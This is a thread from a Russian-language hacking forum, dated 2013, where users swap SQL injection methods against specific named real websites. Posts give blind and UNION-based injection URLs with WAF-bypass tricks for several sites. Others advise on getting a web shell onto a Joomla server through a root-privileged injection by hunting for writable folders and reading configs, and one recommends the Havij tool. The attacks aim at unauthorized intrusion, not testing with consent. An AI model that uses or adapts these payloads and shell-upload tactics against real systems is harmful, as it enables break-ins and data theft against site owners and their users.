ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.09.2013, 14:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Сообщение от BigBear
BigBear said:
И не выведешь. Тут слепая скуля.
Кстати тут удобно использовать метод
more1row
Смотри сам:
Код:
Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=4,1,(select+1+union+select+2))
No error
http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=5,1,(select+1+union+select+2))
Error
А тем более с четвёрки не вытащишь -(
Кто может сказать, что за реагирование на *1
Код:
Code:
http://pereprava.com.ua/index.php?id=1*1
|
|
|
|

04.09.2013, 15:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от Unknowhacker
Unknowhacker said:
А тем более с четвёрки не вытащишь -(
Кто может сказать, что за реагирование на
*1
Код:
Code:
http://pereprava.com.ua/index.php?id=1*1
http://pereprava.com.ua/index.php?id= 1*1 (Вывод страницы 1)
http://pereprava.com.ua/index.php?id= 1*3 (Вывод страницы 3)
Отсюда следует,что, ВОЗМОЖНО, здесь присутствует инъекция
|
|
|
|

05.09.2013, 10:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Очередной фильтр SELECT
Код:
Code:
http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+
но зараза оператора AND никак не хочет пропускать /*!and*/ и методом more1row воспользоваться не получится.
|
|
|
|

05.09.2013, 17:57
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Очередной фильтр
SELECT
Код:
Code:
http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+
но зараза оператора AND никак не хочет пропускать /*!and*/ и методом
more1row
воспользоваться не получится.
Так используйте что ни будь еще - логические операторы, арифметические, побитовые, сравнения...
Там, помимо основного WAF-а еще несколько фильтров, что они только не фильтруют...
Возможно такой синтаксис:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]130[/COLOR][COLOR="#007700"]++[/COLOR][COLOR="#0000BB"]div[/COLOR][COLOR="#007700"]+++(([/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"])+&[/COLOR][COLOR="#0000BB"]255[/COLOR][COLOR="#007700"])+
[/COLOR][/COLOR]
Но до раскрутки еще далеко, с полным фильтром на select ничего не получится.
|
|
|

06.09.2013, 03:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
зы /administrator/ 403, не залиться
|
|
|
|

06.09.2013, 06:40
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от Br@!ns
Br@!ns said:
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
зы /administrator/ 403, не залиться
Возможно прав нет, в большинстве случаев залиться можно только тогда, когда на какую то диру стоять права записи для others, например 777 и сервер в ней что-то исполняет - PHP, SSI, etc...
Надо что-то другое использовать - прочтите виртуальные хосты, другие файлы, конфиги, ищите там полезную инфу...
|
|
|

06.09.2013, 08:19
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от Br@!ns
Br@!ns said:
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
зы /administrator/ 403, не залиться
Если стоит sape, то у них в корне сайта должна быть врайтабельная директория для скриптов сапы, правда закрытая на исполнение .htaccess -ом. Попробуй.
|
|
|

06.09.2013, 17:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 2851
Репутация:
0
|
|
Можно ли что сделать с этой уязвимостью?
Сообщение от None
http://www.v3toys.ru/index.php?nid=19109
|
|
|
|

08.09.2013, 23:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?
|
|
|
|

09.09.2013, 03:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 36927
Репутация:
5
|
|
%Inject_Here%
http://www.itsecteam.com/files/havij/havij_help-english.pdf
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|